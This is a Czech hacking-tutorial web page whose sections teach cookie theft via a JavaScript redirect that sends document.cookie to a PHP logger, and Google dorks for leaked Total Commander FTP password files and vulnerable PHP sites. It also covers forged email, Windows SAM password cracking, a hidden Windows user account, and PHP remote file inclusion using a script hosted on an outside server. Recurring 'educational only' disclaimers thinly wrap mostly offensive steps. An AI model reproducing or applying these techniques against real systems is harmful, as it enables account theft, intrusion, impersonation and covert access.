Návody

Smysluplné a užitečné  návody, které jsou srozumitelné pro každého & Nejlepší Mozektevidi na internetu!

Veškeré zde uvedené informace slouží výhradně ke studijním účelům, tyto informace jsou zde uvedeny za účelem upornění na možná bezpečnostní rizika a slouží pouze k řešení optimálního zabezpečení vlastního počítače, softwaru, serveru, webu atd.! Majitel toho webu nenabádá návštěvníky k porušování zákonů ČR a ostatních států, nenese žádnou odpovědnost za případné zneužití těchto informací!  Tyto "návody" - články  jsou copyright © , kopírování je výslovně zakázáno!

 

 

<< Předchozí návody  1  2  3

 

 

Jak zjistit IP adresu ze zdrojého kódu emailové zprávyKrádež cookiesGoogle tak trochu jinakOdeslání fake mailu - anonymního emailuAdministrátorské heslo windows XPVytvoření neviditelného uživatele WindowsJak zjistit IP adresu počítače?Zjištění IP adresy z Icq protokoluFTP heslaJak změnit produktový klíč Windows XPLogování systému WindowsPřihlášení do Windows bez heslaJak odebrat z Windows XP SP2PHP Injection |

 

 

Jak zjistit IP adresu ze zdrojého kódu emailové zprávy

 

IP adresu je možno jednoduše vyčíst ze zdrojového kódu emailové zprávy. Zdrojový kód zprávy ve většině poštovních klientů získáte takto: 

 

 

Obecné významy hlavičky emailu:

 

 

Názorný příklad zdrojového kódu zprávy s jeho vysvětlením:                                                             Copyright Mozektevidi.cz

 

From - Tue Mar 04 21:46:47 2008                 
X-Account-Key: account7
X-UIDL: UID25-1193506494
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <admin5@mozektevidi.cz>               /odesílatel - email/
X-Original-To: greg@freebiz.net                   /příjemce - email/
Delivered-To: greg@freebiz.net
Received: from localhost (localhost [127.0.0.1])
by mail.freebiz.net (Postfix) with ESMTP id D1D32F630A
for <greg@freebiz.net>; Tue, 4 Mar 2008 21:46:48 +0100 (CET)
X-Virus-Scanned: Debian amavisd-new at mail.freebiz.net
X-Spam-Score: -40
X-Spam-Level:                  Copyright Mozektevidi.cz
X-Spam-Status: No, score=-50 tagged_above=-999 required=3.8
tests=[BAYES_00=-40]
Received: from mail.freebiz.net ([127.0.0.1])
by localhost (mail.freebiz.net [127.0.0.1]) (amavisd-new, port 10024)
with LMTP id n80li5AraqNC for <admin5@mozektevidi.cz>;
Tue, 4 Mar 2008 21:46:43 +0100 (CET)
Received: from smtp.seznam.cz (smtp.seznam [82.115.98.07])
by mail.freebiz.net (Postfix) with ESMTP id 5A07BF4323
for <greg@freebiz.net>; Tue, 4 Mar 2008 21:46:43 +0100 (CET)
Received: from localhost (seznam [127.0.0.1])
by smtp.seznam.cz (Postfix) with ESMTP id A3A02106881B
for <greg@freebiz.net>; Tue, 4 Mar 2008 21:46:42 +0100 (CET)
X-Virus-Scanned: amavisd-new at iol.cz
Received: from smtp.seznam.cz ([127.0.0.1])
by localhost (smtp.seznam.cz [127.0.0.1]) (amavisd-new, port 10151)
with ESMTP id in99a07kF04t for <greg@freebiz.net>;
Tue, 4 Mar 2008 21:46:42 +0100 (CET)
Received: from [127.0.0.1] (ip-87-054-112-55.iol.cz [87.054.112.55])                   /hostname + IP adresa odesílatele emailu/
by smtp.seznam.cz (Postfix) with ESMTP id 109145067308                            /přes jaký smstp server odesílatel email odeslal/
for <greg@freebiz.net>; Tue, 4 Mar 2008 21:46:41 +0100 (CET)
Message-ID: <32CsA501.174478@mozektevidi.cz>                       /ID emailu odesílatele zprávy/        Copyright Mozektevidi.cz
Date: Tue, 04 Mar 2008 21:46:41 +0100                                        /datum a čas/
From: =?ISO-8859-2?Q?Josefo Draww <admin5@mozektevidi.cz>                          /jméno odesílatele + jeho email/
User-Agent: Mozilla Thunderbird 1.0 (Windows/20941207)                        /název programu, ze kterého byl email odeslán/
X-Accept-Language: cs, en-us, en
MIME-Version: 1.0
To: greg@freebiz.net
Subject: pozdrav                            /předmět zprávy/ 
Content-Type: text/plain; charset=ISO-8859-2; format=flowed
Content-Transfer-Encoding: 7bit
X-Antivirus: avast! (VPS 080304-0, 04.03.2008), Outbound message
X-Antivirus-Status: Clean
X-Antivirus: NOD32 for E-mail 2.5.406 [259.15.11/1041]
X-Antivirus: avast! (VPS 080504-0, 04.03.2008), Inbound message
X-Antivirus-Status: Clean

text odesílané zprávy                         /text emailové zprávy/

Copyright Mozektevidi.cz

Tento návod  slouží výhradně ke studijním účelům.

 

Draww, admin Mozektevidi.cz

 

 

 

 

Krádež cookies

 

Především je dobré říci co to vlastně cookies je. Cookies je takový soubor velice malé velikosti, který máte uložený v počítači na disku C ve složce Documents And Settings. Cookies se získávají prohlížením internetu - www stránek, v podstatě vám cookies ukládá majitel www stránek a to především z důvodu vaší indetifikace. Cookies mají časovou platnost, ale jsou i cookies které ve vašem počítači zůstávájí natrvalo, tedy dokud je nesmažete. Bez cookies se rozhodně neobejde elektronické bankovnictví, elektronické obchody atd., zkrátka na cookies zavisí především www stránky, které vyžadují identifikaci uživatele (bez cookies by musel uživatel zadávat přihlašovací údaje na každé stránce) , ale lze je použít samozdřejmě na jakékoliv stránce. Cookies si může přečíst pouze tvůrce cookies, tedy ten kdo vám ji nahrál do počítače.Cookies jsou sice dobrá a užitečná stvořeníčka, ale nesou ve vašem počítači také určitá rizika a to rozhodně nemalá rizika. Pomocí cookies je váš počítač označen, cookies je to co vás prozrazuje, jak píši  zde na Mozektevidi.cz v článku Anonymita na internetu, jak je to s anonymitou na intenetu?, ...k čemu je vám když skyryjete svou IP adresu, když vás cookies prozradí. Rozhodně nejvíce cookies získáte ve vyhledávačích a reklamních serverech, zejména oni chtějí vědět oč se zajímáte někdy jen pro statistiku, ale někdy i k zasílání cílené reklamy. Cookies ve svém nitru obsahují různá data, jedná se např. od data z jakého serveru pochází, ale často obsahují i citlivé údaje, jako jsou  přihlašovací údaje - login a heslo, např. k e-mailu, elektronickému bankovnictví atp. . Především kvůli těmto údajům dochází často ke kráděži cookies z vašeho počítače. A pokud bych měl ještě dodat, tak také nejvíce cookies (a mnohdy škodlivých) získáte na stránkách s pornem, warem, cracky atp. .

Copyright Mozektevidi.cz

A jak vypadá samotná krádež cookies? Bohužél je to velmi jednoduché a lidským vnímám nelze postřehnout! Útočník někde zanechá lukrativní odkaz (např. stačí kliknout a  získáte za pouhou registraci 1000 Kč atp.) na www stránku se škodlivým kódem - javascriptem, do javascriptu je důležité zadat: window.location,document.cookie  a nechat si to poslat -window.location.href="... na php script - $soubor=fopen('cookies.txt','a'); ..., který ukradnuté cookies uloží to souboru .txt , pokud je to cílené, tak vám útočník takový odkaz zašle elektronickou poštou, způsobů je nespočetně. Pokud klinete na takový odkaz, tak se odešle s požadavkem hlavička Referer, čímž útočník snadno získá session (identifikace uživatele).                 Copyright Mozektevidi.cz

Copyright Mozektevidi.cz

Jaká je obrana proti krádeži cookies? Obecně se dá říci, že jednoduchá: postačí zakázat cookies v internetovém prohlížeči (také je možno nastavit, tak že musíte každou cookies chválit), záleží na druhu prohlížeče, ale vždy je to v Nastavení prohlížeče. Nicméně pokud načítání cookies ve svém prohlížeči úplně zakážete, mj. je také dobré zakázat prvky ActiveX, tak budete prohlížením stránek značně omezeni - některé stránky se vám nezobrazí vůbec, protože většina www stránek vyžaduje povolení cookies. Takové zakázání cookies bych viděl, jako nešťasný způsob ochrany proti krádeži cookies. Pokud budete cookies pravidelně mazat ze svého počítače, např. programem CCleaner, tak bych to viděl jako optimálmí řešení zabezpeční proti krádeži cookies.

 

Tento návod  slouží výhradně k osvětě co to vlastně je cookies a jak je zabezpečit, nikoli jako návod jak provádět krádež cookies.

 

Draww, admin Mozektevidi.cz

 

 

 

Google tak trochu jinak     Copyright Mozektevidi.cz

 

Google je nejznámější a nejpoužívanější fulltextový vyhledávač v internetu, který vznikl v roce 1996, a který je naprostou jedničkou mezi vyhledávači a to v celosvětovém měřítku! Jeho technologie vyhledávání je zcela unikátní, především jeho mega datbázi indexovaných www stránek. Google je vzorem všem vyhledávačům na celém světě, je příkladem jak má vyhledávač opravdu fungovat. Google často vyhledává - pronikává tam kam by nemusel a neměl, nachází citlivá data, informace která mají být chráněna před zraky uživatelů internetu. Jedná se např. o FTP hesla Total Commander, Frontpage hesla, loginy a hesla k SQL, hesla z logu kanálu IRC, tiskárny v síti a mnoho jiného. Taková data, informace lze nalést pomocí příkazů - řetězců , které se vkládají do Google. Tyto příkazy se nejčastěji skládají z těchto prvků:

 

Příkazy (znaky), které se doplňují s výše uvedenými příkazy:

 

Příklady příkazů - řetězců:

Pozor! Za dvojtečkou příkazu nikdy nesmí být mezerera!

Při vytváření Google příkazů - řetězců se fantazii meze nekladou, lze je vymýšlet v různé podobě - kombinovat, doplňovat, upravovat... .

 

Víte, že Google vám zjistí Přesný čas

 

Tento návod  slouží výhradně k osvětě o Google vyhledávači, nikoli jako návod jak s ním vykonávat nelegální činnosti.

 

Draww, admin Mozektevidi.cz

 

 

 

Odeslání fake mailu - anonymního emailu Copyright Mozektevidi.cz

 

Způsoby jak odeslat fake mail je několik:

 

1. způsob - odeslat fake mail z počítače přes Telnet

Návod jak odeslat fake mail přes počítač - Telnetem: 

2. způsob - odeslat fake mail z počítače pomocí programu

Pro odeslání fake mailu z počítače použijte program Mailbomber (balíček obsahuje dva programy - program na odeslání emailu bez přílohy a program na odeslání emailu s přílohou).

 

3. způsob - odeslat fake mail přes webový fake mailer

Jedná se o rychlý způsob, jak odeslat fake mail. Doporučováno je použití anonymizéru, programu ke skrytí IP adresy počítače, to je tzv. tuplovaná anonymita.                       Copyright Mozektevidi.cz

 

Tento návod  slouží výhradně k osvětě co to znamená fake mail a jak pozbat fake mail, nikoli jako návod jak odesílat fake maily.

 

Draww, admin Mozektevidi.cz

 

 

 

Administrátorské heslo windows XP

 

Kde se vůbec nachází administrátorské heslo Windows XP?

Administrátorské heslo Windows Xp je uloženo v souboru SAM (System Account Manager), soubor SAM se nachází na disku C:\Windows\System32\config\SAM. Celý SAM soubor je zašifrován, tudíž nelze otevřít, a  používá 128 bitový klíč, kterým je celý SAM ještě jednou přešifrovám. Celá SAM soubor má ještě jednu zálohu, která se nachází také na na disku C:\Windows\Repair.

 

Jak zjistit administrátorské heslo Windows XP, 2000, vista na vlastním počítači, při jeho zapomenutí?

K tomuto úkonu zjištění administrátorského hesla  Windows XP je potřeba vlastnit flash disk (případně CD) a počítač s operačním systémem Linux live. Nejprve si vytvořte bootovací flash disk (případně CD), který vložte do PC s Linuxem live, v biosu si nastavte bootovací zařízení a nabootujte. Dále zkopírujte SAM soubor z počítače (flash disk, CD) kde chcete zjistit administrátorské heslo - C:\Windows\System32\config\SAM. Samotné heslo zjistíte programem Proactive System Password Recovery - ke zjištění hesla je nutná plná verze! V programu Proactive System Password Recovery klikněte na RAS ENTRIES a zaškrtněte MANUAL DECRYPTION, manuálně zadejte SAM soubor, poté vám program vám nalezne heslo ze zašifrovaného SAM souboru.                                                                        Copyright Mozektevidi.cz

Dalším způsobem (jednodušším), jak zjistit administrátorské heslo  Windows XP je zapotřebí stáhnout program OphCrack LiveCD. Ophcrack LiveCD je operační systém Linux Slax, program Ophcrack, numerické rainbow tables. Tato verze programu je zdarma, avšak neobsahuje tyto znaky: ?!$"#%&' *,-+./:;<>[\]^_`={|}@~(). Celý Stažený Program Ophcrack vypálíte na CD a vložíte do PC mechaniky s windowsem, kde chcete zjistit heslo a resetujte počítač, poté se spustí CD samo (nejdříve Linux Slax a až potom program Ophcrack),  program vám vyhledá administrátorské heslo Windows XP, resp. hesla všech uživatelů počítače. Program Ophcrack vyhledává přihlašovací hesla Windows 2000, XP, Vista.

 

Tento návod  slouží výhradně k osvětě o počítačích a jejich zabezpečení, nikoli jako návod jak získávat administrátorká hesla z cizích počítačů.

 

Draww, admin Mozektevidi.cz

 

 

 

 

Vytvoření neviditelného uživatele Windows

 

Při přihlašování do windows se zobrazuje seznam všech uživatelů počítače, tedy mimo administrátora. Pokud chcete vytvořit neviditelný účet windows, tak musíte provést změnu v registru, nejprve kliněte na Start/Spustit - vepište Regedit. Otevře se vám Editor registru, kde provedete malou změnu, neprve vyhledejte klíč - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList. Potom v pravo nově vytvořte (pravým tlačítkem myši) - hodnota DWORD, název stejný jako uživatel. Pokud 2x kliknete na tuto položku, tak se dá upravit údaj hodnoty:  0 - nezobrazovat uživatele, 1 - zobrazovat uživatele.                                 Copyright Mozektevidi.cz

 

Tento návod  slouží výhradně k osvětě o počítačích a jejich zabezpečení, nikoli jako návod jak vytvořit neviditelný účet v cizím počítači.

 

Draww, admin Mozektevidi.cz

 

 


 

 

Jak zjistit IP adresu počítače? Copyright Mozektevidi.cz


Počítač připojený k síti má svou IP adresou - LAN IP (protokol TCP/IP). Jednoduše si zjistěte vaší LAN IP takto: klikněte na Start / Spustit - vepište Cmd. V novém okně potom zadejte příkaz Ipconfig a zmáčkněte Enter. Vypíše se vám LAN IP adresa. WAN IP (Ip adresa, kterou se připojujete na internet) a LAN IP (Ip adresa lokální), jméno počítače a DNS lze také jednoduše zjistit programem Ip 2, který slouží ke zjištění těchto IP adres (program je a freeware a nemusí se instalovat).

 

PHP script ke zjištění IP adresy

<?
$ref = $REMOTE_ADDR;
echo "IP adresa: ";
echo $ref;
?>

Download

 

PHP script IP adresa návštěvníka webu - zasílání na zadaný email:

<?
mail("vas@mail.cz", "IP adresa", $REMOTE_ADDR)
?>

Download

 

PHP script IP adresa návštěvníka webu - logování do souboru log.txt:

<?php
$fp = FOpen("log.txt", "w");
FPutS($fp, (gethostbyname($REMOTE_ADDR)));
FClose($fp);
?>

Download

 

Tento návod  slouží výhradně k osvětě co to vlastně je IP adresa a jak lze zjistit, nikoli jako návod jak zjišťovat cizí IP adresy.

 

Draww, admin Mozektevidi.cz

 

 

Zjištění IP adresy z Icq protokolu

 

Zjištění IP adresy z Icq protokolu, jak můžete zjistit IP adresu uživatele kterým komunikujete přes Icq:

Nejprve si spusťte  Příkazový řádek - Start/Spustit - zadejte Cmd  a Příkazová řádek se vám spustí. Do Příkazového řádku vepište příkaz:  netstat –a  a odešlete Entrem. Vypíše se něco podobného:                                        Copyright Mozektevidi.cz

 

Microsoft Windows XP [Verze 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Mozektevidi.cz>netstat

Aktivní připojení

Protokol  Místní adresa Cizí adresa Stav
TCP eoud-dbcwo58dx3:3840 xmoz.mozektevidi.cz:ftp NAVÁZÁNO
TCP eoud-dbcwo58dx3:3552 poz-9.gs-xw.vol.cz:508 NAVÁZÁNO
TCP eoud-dbcwo58dx3:4236 xmoz.mozektevidi.cz:http NAVÁZÁNO
TCP eoud-dbcwo58dx3:4158 kc-in-f91.google.com:http CLOSE_WAIT
TCP eoud-dbcwo58dx3:4047 lm-in-f147.google.com:http CLOSE_WAIT
TCP eoud-dbcwo58dx3:8124 213.200.002.195: 80 CLOSE_WAIT
TCP eoud-dbcwo58dx3:10279 localhost:1038 NAVÁZÁNO
TCP eoud-dbcwo58dx3:10302 localhost:1020 NAVÁZÁNO
TCP eoud-dbcwo58dx3:1030 localhost:44344 NAVÁZÁNO
TCP eoud-dbcwo58dx3:1029 localhost:1087 NAVÁZÁNO
TCP eoud-dbcwo58dx3:1041 localhost:1029 NAVÁZÁNO
TCP eoud-dbcwo58dx3:1030 localhost:27049 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3722 localhost:3755 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3719 localhost:3779 NAVÁZÁNO            Copyright Mozektevidi.cz
TCP eoud-dbcwo58dx3:3700 localhost:3703 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3722 localhost:3725 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3951 localhost:3960 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3958 localhost:3947 NAVÁZÁNO
TCP eoud-dbcwo58dx3:4334 localhost:120809 NAVÁZÁNO
TCP eoud-dbcwo58dx3:4309 localhost:12089 NAVÁZÁNO
TCP eoud-dbcwo58dx3:12559 localhost:4322 NAVÁZÁNO
TCP eoud-dbcwo58dx3:12127 localhost:4301 CLOSE_WAIT
TCP eoud-dbcwo58dx3:12080 localhost:4374 NAVÁZÁNO
TCP eoud-dbcwo58dx3:26201 localhost:1016 NAVÁZÁNO
C:\Documents and Settings\Mozektevidi.cz>

Výše uvedený sloupek ukazuje veškeré  TCP spojení z vašeho počítače.     Copyright Mozektevidi.cz

Nechte Příkazový řádek zapnutý tak jak je a nyní pošlete zprávu přes Icq, v průběhu odesílání této zprávy zadejte do Příkazového řádku opět příkaz: netstat –a. Nyní se vám tabulka trochu změnila:                                                                       

Microsoft Windows XP [Verze 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Mozektevidi.cz>netstat

Aktivní připojení

Protokol Místní adresa Cizí adresa Stav
TCP eoud-dbcwo58dx3:3840 xmoz.mozektevidi.cz:ftp NAVÁZÁNO
TCP eoud-dbcwo58dx3:3552 poz-9.gs-xw.vol.cz:508 NAVÁZÁNO
TCP eoud-dbcwo58dx3:4236 xmoz.mozektevidi.cz:http NAVÁZÁNO
TCP eoud-dbcwo58dx3:4158 kc-in-f91.google.com:http CLOSE_WAIT
TCP eoud-dbcwo58dx3:4047 lm-in-f147.google.com:http CLOSE_WAIT
TCP eoud-dbcwo58dx3:8124 213.215.012.210: 8009 NAVÁZÁNO
TCP eoud-dbcwo58dx3:10279 localhost:1038 NAVÁZÁNO
TCP eoud-dbcwo58dx3:10302 localhost:1020 NAVÁZÁNO
TCP eoud-dbcwo58dx3:1030 localhost:44344 NAVÁZÁNO
TCP eoud-dbcwo58dx3:1029 localhost:1087 NAVÁZÁNO
TCP eoud-dbcwo58dx3:1041 localhost:1029 NAVÁZÁNO
TCP eoud-dbcwo58dx3:1030 localhost:27049 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3722 localhost:3755 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3719 localhost:3779 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3700 localhost:3703 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3722 localhost:3725 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3951 localhost:3960 NAVÁZÁNO
TCP eoud-dbcwo58dx3:3958 localhost:3947 NAVÁZÁNO
TCP eoud-dbcwo58dx3:4334 localhost:120809 NAVÁZÁNO
TCP eoud-dbcwo58dx3:4309 localhost:12089 NAVÁZÁNO
TCP eoud-dbcwo58dx3:12559 localhost:4322 NAVÁZÁNO
TCP eoud-dbcwo58dx3:12127 localhost:4301 CLOSE_WAIT
TCP eoud-dbcwo58dx3:12080 localhost:4374 NAVÁZÁNO
TCP eoud-dbcwo58dx3:26201 localhost:1016 NAVÁZÁNO
C:\Documents and Settings\Mozektevidi.cz>

 

Tučně označená je získaná IP adresa cílového počítače + port, který je za dvojtečkou - 213.215.012.210: 8009

   Copyright Mozektevidi.cz

 

Tento návod  slouží výhradně k osvětě co to vlastně je IP adresa a jak lze zjistit, nikoli jako návod jak zjišťovat cizí IP adresy.

 

Draww, admin Mozektevidi.cz

 

 

 

 

FTP hesla          Copyright Mozektevidi.cz                                                     

 

Používáte k přístupu na FTP server program Total Commander? Prostřednictvím tohoto programu si jistě ukládáte přístupová hesla na FTP server do svého počítače -  volíte možnost  uložení přístupového hesla v nečitelné podobě do konfiguračního souboru s názvem wcx_ftp.ini, nacházejí na C:\Windows\wcx_ftp.ini. A myslíte si, že jsou vaše hesla v tomto souboru dobře zabezpečena? To se hluboce mýlíte! Jen pro zajímavost zkuste vložit do vyhledávače Google následující řetezec: filetype:ini wcx_ftp.ini. Budete zděšeni kolik vám Google ukáže přihlašovacích hesel z Total Commanderu. Teď si určitě říkáte, že ta hesla jsou přeci v nečitelné podobě, tak o nic nejde. Opět se mýlíte, resp. nemýlíte ale nevíte, že tato nečitelná hesla lze převést do čitelné podoby a to programem  Password Decrypting Tool TC. Můžete provést i další zkoužku: zkopírujte si z vašeho disku soubor wcx_ftp.ini (C:\Windows\wcx_ftp.ini) a dekódujte ho programem FTP Password Ripper. Jste ponaučení a budete přihlašovací údaje nosit pouze ve své hlavě? To si možná říkáte nyní, ale znám lidi a vím, že lidská hloupost je neomezená (tedy bez urážky).

 

Tento návod  slouží výhradně k osvětě co to vlastně je FTP a jeho zabezpečení, nikoli jako návod jak zjišťovat cizí hesla FTP serverů.

 

Draww, admin Mozektevidi.cz

 

 

 

Jak změnit produktový klíč Windows XP      Copyright Mozektevidi.cz  

                                                  

Pokud chcete  z nějakého důvodu změnit produktový klíč Windows XP, tak ve Startu klikněte na Spustit - vepište regedit, otevře se vám Editor registru kde se nachází položka: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents .  Na pravé straně: OOBETimer - pravým tlačítkem změnit  změňte minimálně jedno číslo a stiskněte OK (takto deaktivujete windows). Nyní Klikněte opět na Start a Spustit -  vepište toto: %systemroot%\system32\oobe\msoobe.exe /a  (příkaz na aktivaci windows). Objeví se vám okno pro aktivaci windows, klikněte - Ano, chci aktivovat systém Windows telefonicky s pracovníkem služeb pro zákazníky a poté klepněte na tlačítko Další. Nyní klikněte na položku Změňte kód Product Key. Zadejte nový kód Product Key do pole Nový kód a klepněte na tlačítko Aktualizovat. To je vše, produktový klíč Windows XP je změněn.           Copyright Mozektevidi.cz

 

Tento návod  slouží výhradně k osvětě o počítačích a jejich zabezpečení, nikoli jako návod jak změnit produktový klíč v počítači.

 

Draww, admin Mozektevidi.cz

 

 

 

 

Logování systému Windows          

                                                  

Možná nevíte, že systém Windows XP loguje - zapisuje veškerou  činnost počítače na disk a to již při zavádění systému do počítače. Soubory kam jsou zaznamenávány logy Windows:
C:\Windows\Setuperr.log  – instalační chyby
C:\Windows\Setupact.log  – data o chybách při kopírování souborů na disk C, změny v registrech
C:\Windows\DirectX.log  – data o instalaci rozhraní DirectX             Copyright Mozektevidi.cz
C:\WINDOWS\repair\Setup.log  – data o instalaci systému, která mohou být využita i k obnovení systému
C:\Windows\Setupapi.log  – data s prací se souborem s příponou inf
C:\WINDOWS\Debug\Netsetup.log  – data o spoluúčasti počítače v pracovní skupině, doméně
C:\Windows\WindowsUpdate.log  – data o stažení, instalaci aktualizace systému    Copyright Mozektevidi.cz
C:\Windows\Comsetup.log  – data o součásti Optional Component Manager a COM+

 

Tento návod  slouží výhradně k osvětě o počítačích a jejich zabezpečení, a je upozorněním na logování operačního systému.

 

Draww, admin Mozektevidi.cz

 

 

 

Přihlášení do Windows bez hesla      Copyright Mozektevidi.cz

 

Jste jediným uživatelem uživatelem počítače, nemáte v počítači důležitá data, chcete se přihlašovat do Windows bez hesla a automaticky?  Automatické přihlášení do Windows nastavíte takto:  kliněte na Start, poté Spustit a vepište: userpasswords2, dále jen potvrďte OK a vše je vykonáno. Jednoduché, prosté a  nemusíte zadávat heslo při každém zapnutí počítače (osobně však toto nepreferuji - admin mozektevidi.cz, ale někomu se může tahle rada hodit).

 

Tento návod  slouží výhradně k osvětě o počítačích a jejich zabezpečení, nikoli jako návod jak se přihlásit do cizího počítače bez hesla.

 

Draww, admin Mozektevidi.cz

 

 

 

Jak odebrat z Windows XP SP2  Copyright Mozektevidi.cz

 

Nejste z nějakého důvodu spokojeni s SP2 ve  Windows XP, tak ho odeberte ze systému! Lze to provést jednoduše - přidat - odebrat programy, kde se SP2 nachází v seznamu. Toto však mnohdy nefunguje a SP2 takto nelze odintalovat. Klikněte tedy na tlačítko Start a poté Spustit kam vepíšete C:\windows\$NtServicePackUninstall$\spuninst\spuninst.exe. Nyní dojde ke spuštění Průvodce odebráním produktu SP 2 ze systému Windows XP.

 

Tento návod  slouží výhradně k osvětě o počítačích a jejich zabezpečení.

 

Draww, admin Mozektevidi.cz

 

 

 

 

PHP Injection  Copyright Mozektevidi.cz

 

PHP Injection nebo PHP Include anebo také PHP injekce je zjednodušeně řečeno zneužití PHP funkce - include(). Jedná se o poměrně častou chybu webmasterů, která dává útočníkovi možnost uploadovat na server svůj skript, útočník tak může získat nad webem silnou kontrolu - mazat, editovat, přidávat soubory (hacker by...).                         Copyright Mozektevidi.cz

 

Takto vypadá napadnutelná www stránka: http://www.mozektevidi.cz/index.php?promenna=stranka.php *

*stranka.php - může mít také přípony:html, htm

 

Pokud je web napadnutelný, tak uvnitř vypadá takto:     <? include($promenna); ?>                      

 

Příklad:  vložte do vyhledávače: http://www.mozektevidi.cz/index.php?page=http://google.com **

**Pokud by se vám v prohlížeči objevila stránka Google.com, tak je stránka Google.com napadnutelný

 

Vyhledávání napadnutelných webů se používá Google.com. Jedná se např. o řetězce:     Copyright Mozektevidi.cz

inurl:"mozektevidi.cz/*.php?page=*.php"

inurl:index.php?include=

inurl:index.php?id=

inurl:index.php?page=

atd.

 

K výpisu kódu je zapotřebí jednoduchý PHP script, který se uloží kamkoliv na server, např. na freehosting. Pokud má váš web bezpečnostní trhlinu, tak doplňte do vaší URL adresy toto: http://www.mozektevidi.cz/index.php?page=http://serversescriptem.cz/script.txt.

To je vše - zobrazí se zdrojový kód index.php a váš web je "HACKED BY"! Proto velký pozor na tuto často vyskytující se chybu. Tento návod slouží k zabezpečení, vyvarování se chyb vlastních webových stránek před PHP injection, nikoli jako návod jak zneužívat cizí weby!                 Copyright Mozektevidi.cz

 

Tento návod  slouží výhradně k osvětě co to je php injection a obrana před touto technikou, nikoli jako návod jak tuto techniku používat.

 

Draww, admin Mozektevidi.cz

 

 

Nahoru

 

<< Předchozí návody  1  2  3

 

 

Copyright Mozektevidi.cz - zákaz kopírování této stránky